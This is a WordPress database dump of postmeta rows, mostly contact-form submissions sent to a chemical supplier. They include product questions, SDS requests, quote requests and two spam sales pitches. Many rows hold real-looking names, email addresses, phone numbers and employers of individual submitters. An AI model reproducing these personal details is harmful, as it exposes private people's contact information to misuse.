INSERT INTO `wp_postmeta` VALUES (36129, 4023, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36130, 4023, '_field_1', 'Dave Norman'); 
INSERT INTO `wp_postmeta` VALUES (36131, 4023, '_field_10', 'Lockheed Martin'); 
INSERT INTO `wp_postmeta` VALUES (36132, 4023, '_field_2', 'david.a.norman@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (36133, 4023, '_field_8', '(607) 751-6729'); 
INSERT INTO `wp_postmeta` VALUES (36134, 4023, '_field_3', 'I would like to know if there is significant difference between the     MS-122AD Release agent and MS-143H Release agent? We currently use the MS-143H in our facility. This will be used on machined parts.'); 
INSERT INTO `wp_postmeta` VALUES (36135, 4023, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36136, 4023, '_sub_id', '4023'); 
INSERT INTO `wp_postmeta` VALUES (36137, 4024, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36138, 4024, '_seq_num', '553'); 
INSERT INTO `wp_postmeta` VALUES (36139, 4024, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36140, 4024, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36141, 4024, '_field_1', 'BUĞRA ERDOĞAN'); 
INSERT INTO `wp_postmeta` VALUES (36142, 4024, '_field_10', 'HARMANLI KİMYA VE MAKİNE SAN.TİC.LTD.ŞTİ'); 
INSERT INTO `wp_postmeta` VALUES (36143, 4024, '_field_2', 'bugra.erd@harmanlikimya.com'); 
INSERT INTO `wp_postmeta` VALUES (36144, 4024, '_field_8', '(212) 244-8645'); 
INSERT INTO `wp_postmeta` VALUES (36145, 4024, '_field_3', 'I would like to find out an equivalent products at Miller Stephenson  which have the same characteristic of the lord products (Chemosil 211 Primer And Bonding Agent For NBR Elastomers and Chemosil NL 222 Universal Bonding Agent) \r\nMy customer would like to use the products to bond natural rubber with 4144 quality steel and to bond synthetic rubber with 4144 quality steel. Products should be Okay and cure at 165°C'); 
INSERT INTO `wp_postmeta` VALUES (36146, 4024, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36147, 4024, '_sub_id', '4024'); 
INSERT INTO `wp_postmeta` VALUES (36148, 4025, '_wp_attached_file', '2016/09/MS-752U.pdf'); 
INSERT INTO `wp_postmeta` VALUES (36149, 1834, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (36150, 1834, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (36151, 1834, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (36152, 1834, '_yoast_wpseo_focuskw_text_input', 'UltraPure Cleaning Agent'); 
INSERT INTO `wp_postmeta` VALUES (36153, 1834, '_yoast_wpseo_focuskw', 'UltraPure Cleaning Agent'); 
INSERT INTO `wp_postmeta` VALUES (36154, 1834, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (36155, 1834, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (36156, 1834, '_yoast_wpseo_linkdex', '37'); 
INSERT INTO `wp_postmeta` VALUES (36157, 4027, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36158, 4027, '_seq_num', '275'); 
INSERT INTO `wp_postmeta` VALUES (36159, 4027, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36160, 4027, '_field_12', 'Roger Ackley'); 
INSERT INTO `wp_postmeta` VALUES (36161, 4027, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (36162, 4027, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36163, 4027, '_field_14', 'Rogera427@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (36164, 4027, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (36165, 4027, '_field_16', 'What solvent will remove MS-122AD'); 
INSERT INTO `wp_postmeta` VALUES (36166, 4027, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36167, 4027, '_sub_id', '4027'); 
INSERT INTO `wp_postmeta` VALUES (36168, 4028, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36169, 4028, '_seq_num', '554'); 
INSERT INTO `wp_postmeta` VALUES (36170, 4028, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36171, 4028, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36172, 4028, '_field_1', 'Tracy Rose'); 
INSERT INTO `wp_postmeta` VALUES (36173, 4028, '_field_10', 'Engineering Technology Corp'); 
INSERT INTO `wp_postmeta` VALUES (36174, 4028, '_field_2', 'tracy.rose@entec.com'); 
INSERT INTO `wp_postmeta` VALUES (36175, 4028, '_field_8', '(801) 486-8721'); 
INSERT INTO `wp_postmeta` VALUES (36176, 4028, '_field_3', 'I need the SDS sheet for the:\r\nIDA clean MS-282\r\nWe bought it a while ago &amp; we are updating our chemicals.\r\nPlease email it to me.'); 
INSERT INTO `wp_postmeta` VALUES (36177, 4028, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36178, 4028, '_sub_id', '4028'); 
INSERT INTO `wp_postmeta` VALUES (36179, 4029, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36180, 4029, '_seq_num', '555'); 
INSERT INTO `wp_postmeta` VALUES (36181, 4029, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36182, 4029, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36183, 4029, '_field_1', 'Bryan Wentz'); 
INSERT INTO `wp_postmeta` VALUES (36184, 4029, '_field_10', 'Kick Stops'); 
INSERT INTO `wp_postmeta` VALUES (36185, 4029, '_field_2', 'bryan.a.wentz@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36186, 4029, '_field_8', '(815) 790-7321'); 
INSERT INTO `wp_postmeta` VALUES (36187, 4029, '_field_3', 'Hello,\r\nI would like to introduce you to our new cargo restraint device for enclosed trailers, Kick Stops. \r\nWe have solved the problem of the billions of dollars lost on damaged cargo, insurance claims and we have saved hundreds of hours of warehouse workers. Our device is cheaper than cargo straps while being easier to apply and unload. \r\n\r\nIts design is rugged and easy to use. Simply place the device next to a pallet you need secured and kick and step into place. That’s it! You’re done! To fully restrain the movement of the pallet in both direction, use a 2nd Kick Stop Cargo Restraint Device along with the adjoining side and repeat the process. \r\nThe results are simple:\r\nPallets will not shift or move\r\nNo damaged to cargo\r\nMinimize insurance claim\r\nSafer on the road\r\nSafer unloading\r\nNo re-palletizing cargo\r\nFaster unload times\r\nInexpensive &amp; Reusable \r\nPlease take a few minutes to watch the informative video below. I have also attached an informative one pager.\r\nKick Stops Video\r\nKick Stops are $2.99 a piece. \r\nIf you are interested in our product, please call or email me for samples or to place an order.\r\nThank you,\r\nBryan Wentz\r\nNational Sales Manager\r\n815-790-7321\r\nBwentz@kickstops.net'); 
INSERT INTO `wp_postmeta` VALUES (36188, 4029, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36189, 4029, '_sub_id', '4029'); 
INSERT INTO `wp_postmeta` VALUES (36190, 4030, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36191, 4030, '_seq_num', '556'); 
INSERT INTO `wp_postmeta` VALUES (36192, 4030, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36193, 4030, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36194, 4030, '_field_1', 'Bryan Wentz'); 
INSERT INTO `wp_postmeta` VALUES (36195, 4030, '_field_10', 'Kick Stops'); 
INSERT INTO `wp_postmeta` VALUES (36196, 4030, '_field_2', 'bwentz@kickstops.net'); 
INSERT INTO `wp_postmeta` VALUES (36197, 4030, '_field_8', '(815) 790-7321'); 
INSERT INTO `wp_postmeta` VALUES (36198, 4030, '_field_3', 'Hello,\r\nI would like to introduce you to our new cargo restraint device for enclosed trailers, Kick Stops. \r\nWe have solved the problem of the billions of dollars lost on damaged cargo, insurance claims and we have saved hundreds of hours of warehouse workers. Our device is cheaper than cargo straps while being easier to apply and unload. \r\n\r\nIts design is rugged and easy to use. Simply place the device next to a pallet you need secured and kick and step into place. That’s it! You’re done! To fully restrain the movement of the pallet in both direction, use a 2nd Kick Stop Cargo Restraint Device along with the adjoining side and repeat the process. \r\nThe results are simple:\r\nPallets will not shift or move\r\nNo damaged to cargo\r\nMinimize insurance claim\r\nSafer on the road\r\nSafer unloading\r\nNo re-palletizing cargo\r\nFaster unload times\r\nInexpensive &amp; Reusable \r\nPlease take a few minutes to watch the informative video below. I have also attached an informative one pager.\r\nKick Stops Video\r\nKick Stops are $2.99 a piece. \r\nIf you are interested in our product, please call or email me for samples or to place an order.\r\nThank you,\r\nBryan Wentz\r\nNational Sales Manager\r\n815-790-7321\r\nBwentz@kickstops.net'); 
INSERT INTO `wp_postmeta` VALUES (36199, 4030, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36200, 4030, '_sub_id', '4030'); 
INSERT INTO `wp_postmeta` VALUES (36201, 4031, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36202, 4031, '_seq_num', '557'); 
INSERT INTO `wp_postmeta` VALUES (36203, 4031, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36204, 4031, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36205, 4031, '_field_1', 'Abigail Skibowski'); 
INSERT INTO `wp_postmeta` VALUES (36206, 4031, '_field_10', 'Michigan Scientific Corporation'); 
INSERT INTO `wp_postmeta` VALUES (36207, 4031, '_field_2', 'akskibowski@michsci.com'); 
INSERT INTO `wp_postmeta` VALUES (36208, 4031, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36209, 4031, '_field_3', 'Hello,\r\nWe (Michigan Scientific Corporation) are currently using Epon Resin 862 along with Epikure curing agent W in our products. When we send our products to our customers, they solder wires to terminals that are encapsulated with the Epoxy. We have noticed that when soldering to the terminals, the heat is dispersed through the epoxy and it causes it to bubble. This causes the customer to not be able to use the product anymore because the epoxy surface has to be flat. Our customers insist that they are not heating it excessively so we did our own test and found that it takes less than 10 seconds for the epoxy to bubble at the recommended soldering iron temperature.\r\nApparently, we used to use curing agent Z and this did not happen. I was not around at this time so I do not know much about it, but I heard we had to switch due to regulations.\r\nIf there are better options and a way to alleviate this issue, please  contact me. I can also send pictures of what is happening.\r\nI look forward to hearing from you.\r\nKind Regards,\r\nAbigail'); 
INSERT INTO `wp_postmeta` VALUES (36210, 4031, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36211, 4031, '_sub_id', '4031'); 
INSERT INTO `wp_postmeta` VALUES (36212, 4032, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36213, 4032, '_seq_num', '558'); 
INSERT INTO `wp_postmeta` VALUES (36214, 4032, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36215, 4032, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36216, 4032, '_field_1', 'Brad Miller'); 
INSERT INTO `wp_postmeta` VALUES (36217, 4032, '_field_10', 'RipTide Sports, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (36218, 4032, '_field_2', 'brad@riptidesports.com'); 
INSERT INTO `wp_postmeta` VALUES (36219, 4032, '_field_8', '(805) 280-5486'); 
INSERT INTO `wp_postmeta` VALUES (36220, 4032, '_field_3', 'Looking for an economical alternative to Stoner E-236 urethane mold release in spray cans'); 
INSERT INTO `wp_postmeta` VALUES (36221, 4032, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36222, 4032, '_sub_id', '4032'); 
INSERT INTO `wp_postmeta` VALUES (36223, 3989, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/shutterstock_184233572.jpg'); 
INSERT INTO `wp_postmeta` VALUES (36224, 3985, '_wp_old_slug', 'shieldsys-815-dryfilm-wire-coating'); 
INSERT INTO `wp_postmeta` VALUES (36225, 4035, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36226, 4035, '_seq_num', '559'); 
INSERT INTO `wp_postmeta` VALUES (36227, 4035, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36228, 4035, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36229, 4035, '_field_1', 'Keith Lindsey'); 
INSERT INTO `wp_postmeta` VALUES (36230, 4035, '_field_10', 'TRAX Intl. LLC'); 
INSERT INTO `wp_postmeta` VALUES (36231, 4035, '_field_2', 'larkin.k.lindsey.ctr@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (36232, 4035, '_field_8', '(575) 679-2802'); 
INSERT INTO `wp_postmeta` VALUES (36233, 4035, '_field_3', 'Request most current SDS for your MS-190HD Heavy Duty Flux Remover, 16 oz.\n\nThe latest MSDS version we have, has a review date of 1999.'); 
INSERT INTO `wp_postmeta` VALUES (36234, 4035, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36235, 4035, '_sub_id', '4035'); 
INSERT INTO `wp_postmeta` VALUES (36236, 4036, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36237, 4036, '_seq_num', '560'); 
INSERT INTO `wp_postmeta` VALUES (36238, 4036, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36239, 4036, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36240, 4036, '_field_1', 'Chris Walker'); 
INSERT INTO `wp_postmeta` VALUES (36241, 4036, '_field_10', '3M Company'); 
INSERT INTO `wp_postmeta` VALUES (36242, 4036, '_field_2', 'cbwalker2@mmm.com'); 
INSERT INTO `wp_postmeta` VALUES (36243, 4036, '_field_8', '(651) 733-6968'); 
INSERT INTO `wp_postmeta` VALUES (36244, 4036, '_field_3', 'Please provide pricing for VAZO 67 - assuming buying 1-2 pounds for experimental work.\n\nBest Regards,\n\nChris'); 
INSERT INTO `wp_postmeta` VALUES (36245, 4036, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36246, 4036, '_sub_id', '4036'); 
INSERT INTO `wp_postmeta` VALUES (36247, 4037, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36248, 4037, '_seq_num', '561'); 
INSERT INTO `wp_postmeta` VALUES (36249, 4037, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36250, 4037, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36251, 4037, '_field_1', 'Beth'); 
INSERT INTO `wp_postmeta` VALUES (36252, 4037, '_field_10', 'Sevron'); 
INSERT INTO `wp_postmeta` VALUES (36253, 4037, '_field_2', 'bethany@sevron.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (36254, 4037, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36255, 4037, '_field_3', 'Good morning,\r\n\r\nI am contacting you to obtain a safety data sheet for the following product stated below:\r\n\r\nProduct:\r\nMs122a release agent/dry lubricant\r\n\r\nI am working on behalf of a company called GKN.\r\n\r\nIf possible, please provide a GHS version.'); 
INSERT INTO `wp_postmeta` VALUES (36256, 4037, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36257, 4037, '_sub_id', '4037'); 
INSERT INTO `wp_postmeta` VALUES (36258, 4038, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36259, 4038, '_seq_num', '562'); 
INSERT INTO `wp_postmeta` VALUES (36260, 4038, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36261, 4038, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36262, 4038, '_field_1', 'Jenifer Boyd'); 
INSERT INTO `wp_postmeta` VALUES (36263, 4038, '_field_10', 'PPG Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (36264, 4038, '_field_2', 'jboyd@ppg.com'); 
INSERT INTO `wp_postmeta` VALUES (36265, 4038, '_field_8', '(404) 353-5217'); 
INSERT INTO `wp_postmeta` VALUES (36266, 4038, '_field_3', 'Could you please send the Canadian English and Canadian French version SDS for MS-122AD RELEASE AGENT PTFE, 14 OZ AEROSOL '); 
INSERT INTO `wp_postmeta` VALUES (36267, 4038, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36268, 4038, '_sub_id', '4038'); 
INSERT INTO `wp_postmeta` VALUES (36269, 4039, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36270, 4039, '_seq_num', '563'); 
INSERT INTO `wp_postmeta` VALUES (36271, 4039, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36272, 4039, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36273, 4039, '_field_1', 'Salman Younas'); 
INSERT INTO `wp_postmeta` VALUES (36274, 4039, '_field_10', 'Trade Dynamics International'); 
INSERT INTO `wp_postmeta` VALUES (36275, 4039, '_field_2', 'salman.younas@tradedynamicsinternational.com'); 
INSERT INTO `wp_postmeta` VALUES (36276, 4039, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36277, 4039, '_field_3', 'Hello, I need 10 bottles/Kits for DER 330 / EPON 826 Epoxy resin. \r\n\r\nCan you please forward for sales or a distributor who can quote me with leadtime plz \r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (36278, 4039, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36279, 4039, '_sub_id', '4039'); 
INSERT INTO `wp_postmeta` VALUES (36280, 4040, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36281, 4040, '_seq_num', '276'); 
INSERT INTO `wp_postmeta` VALUES (36282, 4040, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36283, 4040, '_field_12', 'Annette Dunbar'); 
INSERT INTO `wp_postmeta` VALUES (36284, 4040, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (36285, 4040, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36286, 4040, '_field_14', 'annette.dunbar.1.ctr@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (36287, 4040, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (36288, 4040, '_field_16', 'Hello, I work in the environmental department for the Air Force tracking hazardous materials and I need to see if you can provide me with the Material Safety Data Sheet (MSDS) for the MS-190 HD. I am aware that this has been discontinued for some time now, but a customer of ours has this on their shelf and in order to be in compliance they need to provide us with a Manufactures MSDS/SDS and the only document that they have is a &quot;Third Party&quot; document.\n\nWill you please dig into your old records and provide me with a copy of the MSDS? :)\n\nThank You for Your Time in Advance!\n\nAnnette Dunbar\nannette.dunbar.1.ctr@us.af.mil'); 
INSERT INTO `wp_postmeta` VALUES (36289, 4040, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36290, 4040, '_sub_id', '4040'); 
INSERT INTO `wp_postmeta` VALUES (36292, 4043, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36293, 4043, '_seq_num', '277'); 
INSERT INTO `wp_postmeta` VALUES (36294, 4043, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36295, 4043, '_field_12', 'dante san miguel'); 
INSERT INTO `wp_postmeta` VALUES (36296, 4043, '_field_13', 'raytheon'); 
INSERT INTO `wp_postmeta` VALUES (36297, 4043, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36298, 4043, '_field_14', 'dante.san.miguel@raytheon.com'); 
INSERT INTO `wp_postmeta` VALUES (36299, 4043, '_field_15', '(949) 861-1667'); 
INSERT INTO `wp_postmeta` VALUES (36300, 4043, '_field_16', 'is there a shelf life for the release coat ms-143 series\nif so what lab test can be done to determine if it is still okay or not (other than actually testing in actual molding)'); 
INSERT INTO `wp_postmeta` VALUES (36301, 4043, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36302, 4043, '_sub_id', '4043'); 
INSERT INTO `wp_postmeta` VALUES (36303, 4044, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36304, 4044, '_seq_num', '564'); 
INSERT INTO `wp_postmeta` VALUES (36305, 4044, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36306, 4044, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36307, 4044, '_field_1', 'kalle lambrechts'); 
INSERT INTO `wp_postmeta` VALUES (36308, 4044, '_field_10', 'Tessenderlo Chemie Ham'); 
INSERT INTO `wp_postmeta` VALUES (36309, 4044, '_field_2', 'kalle.lambrechts@tessenderlo.com'); 
INSERT INTO `wp_postmeta` VALUES (36310, 4044, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36311, 4044, '_field_3', 'Hi,\r\n\r\nWe&#039;re currently looking for a oil/lybricant for a labyrinth seal.\r\n\r\nThe oil should be able to withstand temperatures up to 350 °C and hydrochloric acid fumes.\r\n\r\nIs there a type of krytox that would be suitable for this application?\r\n\r\nIf so, would you be so kind to send me the safety data sheet and a quote for 350 liters of the product.\r\n\r\nKind regards,\r\n\r\nKalle Lambrechts'); 
INSERT INTO `wp_postmeta` VALUES (36312, 4044, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36313, 4044, '_sub_id', '4044'); 
INSERT INTO `wp_postmeta` VALUES (36314, 4045, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36315, 4045, '_seq_num', '565'); 
INSERT INTO `wp_postmeta` VALUES (36316, 4045, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36317, 4045, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36318, 4045, '_field_1', 'Daniel Jason'); 
INSERT INTO `wp_postmeta` VALUES (36319, 4045, '_field_10', 'SEO'); 
INSERT INTO `wp_postmeta` VALUES (36320, 4045, '_field_2', 'daniel.jason20022@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (36321, 4045, '_field_8', '(516) 734-6067'); 
INSERT INTO `wp_postmeta` VALUES (36322, 4045, '_field_3', '\r\nHello Sir/Madam,\r\n\r\nHope you&#039;re having a great day!\r\n\r\nMyself Daniel,  from an Internet Marketing Company. \r\n\r\nI would like to tell you some points about your online business. I hope  you won’t mind spending only 2-3 minutes to have a look at the following lines:\r\n\r\nIt seems you&#039;ve been spending budget with sponsored listing or PPC.\r\n\r\n. In PPC, you may get the sales but only after paying a certain amount  every time and if you stop paying, then the sales will be vanished soon.\r\n\r\n . In SEO, You need to spend budget for few months. Once keywords will be in first page of Google, you can get satisfied traffic for long time. \r\n\r\n. 90% of users like Organic results over the sponsored ones because these results are more relevant and valuable. So just imagine how many valuable customers you are losing by not focusing on organic search results.\r\n\r\nBy investing a few months in SEO, you can see drastic changes in your  website internally and externally. We&#039;ll show you TOP Rankings in your  keywords, link popularity, organic traffic and many more...\r\n\r\nAfter reviewing your website , I noticed some major on-page and off-page issues need to be fixed soon. For more information about your site errors, please respond to my email.\r\n\r\nI would be happy to provide you Complete Site Analysis Report (free of cost) with our Company Profile, Work Experience and Client Testimonials. \r\n\r\nOur main AIM is customer satisfaction. We are not like others. We&#039;ve limited customers and make it sure they are really happy with our performance. \r\n\r\nYou may be interested with Big Big Companies but I can say they&#039;re taking money only showing their company brand to customers; otherwise the result part is Zero. Decision is yours!\r\n\r\nWe wish you the best of luck and looking forward to a long and healthy business relationship with you and your company.\r\n\r\nWaiting for your positive response… \r\n\r\nBest Regards,\r\n\r\nDaniel Jason\r\n--------------------------------------\r\nBusiness Development Manager\r\n173 Blueberry Lane, Hicksville, \r\nNew York 11801, USA\r\n​\r\nPS: If you&#039;re not interested, just “No”, we will never contact you again​'); 
INSERT INTO `wp_postmeta` VALUES (36323, 4045, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36324, 4045, '_sub_id', '4045'); 
INSERT INTO `wp_postmeta` VALUES (36325, 4046, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36326, 4046, '_seq_num', '566'); 
INSERT INTO `wp_postmeta` VALUES (36327, 4046, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36328, 4046, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36329, 4046, '_field_1', 'Ron St.John'); 
INSERT INTO `wp_postmeta` VALUES (36330, 4046, '_field_10', 'NYANG'); 
INSERT INTO `wp_postmeta` VALUES (36331, 4046, '_field_2', 'ronald.e.stjohn.mil@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (36332, 4046, '_field_8', '(518) 344-2446'); 
INSERT INTO `wp_postmeta` VALUES (36333, 4046, '_field_3', 'To whom it may concern: I was wondering if there is a NSN for this (National Stock Number) EPIKURE 3234?\nThanks in advance, \nMSgt Ron St.John'); 
INSERT INTO `wp_postmeta` VALUES (36334, 4046, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36335, 4046, '_sub_id', '4046'); 
INSERT INTO `wp_postmeta` VALUES (36336, 4048, '_wp_attached_file', '2017/04/242L-AS-17.pdf'); 
INSERT INTO `wp_postmeta` VALUES (36337, 4050, '_wp_attached_file', '2017/04/3125.pdf'); 
INSERT INTO `wp_postmeta` VALUES (36338, 4052, '_wp_attached_file', '2017/04/MS-143TE.pdf'); 
INSERT INTO `wp_postmeta` VALUES (36339, 4054, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36340, 4054, '_seq_num', '567'); 
INSERT INTO `wp_postmeta` VALUES (36341, 4054, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36342, 4054, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36343, 4054, '_field_1', 'Rick Lang'); 
INSERT INTO `wp_postmeta` VALUES (36344, 4054, '_field_10', 'Mile High'); 
INSERT INTO `wp_postmeta` VALUES (36345, 4054, '_field_2', 'mhu1@att.net'); 
INSERT INTO `wp_postmeta` VALUES (36346, 4054, '_field_8', '(949) 481-7510'); 
INSERT INTO `wp_postmeta` VALUES (36347, 4054, '_field_3', 'I need 50,000 gal. per month of mold release for wood forms for concrete, construction for export in 5000 gal. flex containers.'); 
INSERT INTO `wp_postmeta` VALUES (36348, 4054, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36349, 4054, '_sub_id', '4054'); 
INSERT INTO `wp_postmeta` VALUES (36350, 4055, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36351, 4055, '_seq_num', '568'); 
INSERT INTO `wp_postmeta` VALUES (36352, 4055, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36353, 4055, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36354, 4055, '_field_1', 'Gary Bowden'); 
INSERT INTO `wp_postmeta` VALUES (36355, 4055, '_field_10', 'Badger Meter'); 
INSERT INTO `wp_postmeta` VALUES (36356, 4055, '_field_2', 'gbowden@badgermeter.com'); 
INSERT INTO `wp_postmeta` VALUES (36357, 4055, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36358, 4055, '_field_3', 'Can you please provide me the SDS for MS-460H / 462H\nSilicone Conformal Coating?'); 
INSERT INTO `wp_postmeta` VALUES (36359, 4055, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36360, 4055, '_sub_id', '4055'); 
INSERT INTO `wp_postmeta` VALUES (36361, 4056, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36362, 4056, '_seq_num', '569'); 
INSERT INTO `wp_postmeta` VALUES (36363, 4056, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36364, 4056, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36365, 4056, '_field_1', 'Gary Bowden'); 
INSERT INTO `wp_postmeta` VALUES (36366, 4056, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (36367, 4056, '_field_2', 'gbowden@badgermeter.com'); 
INSERT INTO `wp_postmeta` VALUES (36368, 4056, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36369, 4056, '_field_3', 'Can you please provide SDS for the following products:\nMS462N\nMS730\nMS260\nMS460W'); 
INSERT INTO `wp_postmeta` VALUES (36370, 4056, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36371, 4056, '_sub_id', '4056'); 
INSERT INTO `wp_postmeta` VALUES (36372, 4057, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36373, 4057, '_seq_num', '570'); 
INSERT INTO `wp_postmeta` VALUES (36374, 4057, '_action', 'submit'); 
